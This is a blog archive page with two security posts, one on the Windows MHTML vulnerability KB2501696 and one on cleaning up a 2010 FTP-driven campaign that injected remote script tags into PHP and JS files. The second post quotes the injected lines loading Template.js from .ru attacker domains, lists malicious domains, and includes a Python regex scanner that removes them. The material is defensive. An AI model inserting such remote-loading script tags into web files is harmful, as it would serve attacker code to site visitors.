Archive for the ‘Malware’ Category

Microsoft KB2501696 MHTML Vulnerability Test and Quick Fix Workaround – Group Policy Friendly

January 31st, 2011 5 comments

All Microsoft platforms since Windows XP SP3 are affected by this pretty nasty vulnerability. KB2501696 explains that the bug is in the way Windows handles MHTML documents. Internet Explorer is not the one at fault here, this is a Windows bug; however, IE will be the attack vector for anyone wanting to take advantage of this flaw (and they will).

First off, to see if you are affected, follow this test link using Internet Explorer. If you get a popup box saying you are affected, then you should apply this fix right away. Also, make sure you are using Internet Explorer since most other browsers do not use the Windows MHTML libraries.

Microsoft gives a lame “FixIt” MSI that is not very GPO friendly. So I went out and wrote my own fix for it. It’s a batch script that you can run locally on a single computer or deploy as a “startup/shutdown script” in Group Policy without any edits needed. It is also compatible with both x86 and x64 machines. Copy the following into your favorite text editor and give it a “.cmd” extension.

You can also click here to download it. Comment below and let me know how this works for you or if you have any other questions/comments/improvements!

Thanks!

Categories: How To, Malware, MHTML, Security, Vulnerability

Getting pocketbloke.ru, inkrainbow.ru, pantsletter.ru JavaScript and PHP malware code injection hacks/infection? Get the fix here!

August 17th, 2010 124 comments

I have put together a PHP script to automatically remove all traces of this malicious code from your website. All you have to do is upload the script to the root of your web directory, then access the page with any browser. I’ve built in many features, including folder and file recursion, file extension filtering, automatic file backups, and two modes of operation: search only, and search and fix.

Click here to see the .RU Removal Script in action! (demo)

or…

Click here for the .RU Removal Script Source Code

or here for it on PasteBin

Let me know in the comments if it works for you or if you have any feature requests!

Thanks to everyone commenting below, we have found out that malware on your PC is stealing your FTP credentials for websites you have access to. The attackers have an automated script that logs in to your site over FTP and appends a link to their malicious code to your PHP and JS files.

It looks like this in JavaScript files:

document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/Template.js"></scri'+'pt>');

PHP or HTML files contain the following at the end:

<script type="text/javascript" src="http://inkrainbow.ru/Template.js"></script>
<!--3848d52fcd665b3d7d96c22e5b6a5451-->

Here is a short list of some domain names that we’ve come across…

Known Malicious Domains:

  • pocketbloke.ru
  • inkrainbow.ru
  • pantsletter.ru
  • fightkid.ru
  • shirtdifficulty.ru
  • casechick.ru
  • obscurewax.ru
  • nuttypiano.com
  • Many others… (comment domains you find below)

STEPS TO TAKE TO REMOVE THE THREAT:

  1. Run MalwareBytes and get rid of anything on your machine
  2. Uninstall your FTP client
  3. Change your FTP passwords
  4. Update JAVA – According to this CERT KB
  5. Remove all traces of the scripts from your domains

UPDATE (8/26/2010): Now more than just .RU are involved which means the script in its current state won’t detect it. Working on a new way to detect this issue. Any ideas? Comment below.
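As an added example (not the .RU Removal Script itself), here is a Python scanner with the same two modes, search only and search and fix with automatic .bak backups, that keys on the shape of the two injected snippets quoted above (the split-tag document.write, and a remote script tag followed by a 32-hex marker comment) rather than on the .ru domain, which is the detection gap the 8/26 update describes. The sample files and the cdn.example URL are constructed for the demo; the domains in the samples are the ones quoted in the post.

```python
import re
import tempfile
from pathlib import Path

# Constructed samples mirroring the two injected snippets quoted in the post.
SAMPLE_JS = ("document.write('<sc'+'ript type=\"text/javascript\" "
             "src=\"http://pocketbloke.ru/Template.js\"></scri'+'pt>');")
SAMPLE_HTML = ('<script type="text/javascript" src="http://inkrainbow.ru/Template.js"></script>\n'
               '<!--3848d52fcd665b3d7d96c22e5b6a5451-->')

# Signatures key on the injection's shape, not the .ru TLD, so the newer non-.ru domains still match.
JS_INJECT = re.compile(
    r"""document\.write\('<sc'\+'ript[^)]*?src="https?://[^"]+"[^)]*?</scri'\+'pt>'\);?""", re.I)
HTML_INJECT = re.compile(
    r"""<script[^>]*\bsrc="https?://[^"]+"[^>]*>\s*</script>\s*<!--[0-9a-f]{32}-->""", re.I)

def find_injections(text):
    """Return (kind, snippet) for every injected block found in text."""
    hits = [("js", m.group(0)) for m in JS_INJECT.finditer(text)]
    return hits + [("html", m.group(0)) for m in HTML_INJECT.finditer(text)]

def clean_text(text):
    """Strip every injected block; the rest of the file is left untouched."""
    return HTML_INJECT.sub("", JS_INJECT.sub("", text))

def scan_tree(root, fix=False):
    """Recurse under root, report {relative path: hit count}; in fix mode back up, then rewrite."""
    report = {}
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in {".js", ".php", ".html", ".htm"}:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        if not (hits := find_injections(text)):
            continue
        report[path.relative_to(root).as_posix()] = len(hits)
        if fix:
            Path(str(path) + ".bak").write_bytes(path.read_bytes())  # backup before editing
            path.write_text(clean_text(text), encoding="utf-8")
    return report

def demo():
    """Constructed web root: search-only report, then fix, then rescan to confirm it is clean."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "inc").mkdir()
        (root / "inc" / "menu.js").write_text("function f(){}\n" + SAMPLE_JS, encoding="utf-8")
        (root / "index.php").write_text("<?php echo 'x'; ?>\n" + SAMPLE_HTML, encoding="utf-8")
        (root / "clean.html").write_text('<script src="http://cdn.example/a.js"></script>\n', encoding="utf-8")
        before = scan_tree(root)
        scan_tree(root, fix=True)
        return before, scan_tree(root)
```

Run `scan_tree(Path("/path/to/webroot"))` first to review the hit list, then again with `fix=True`; the .bak copies are not rescanned because their extension is excluded.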

Categories: Malware, PHP, Randomness, Security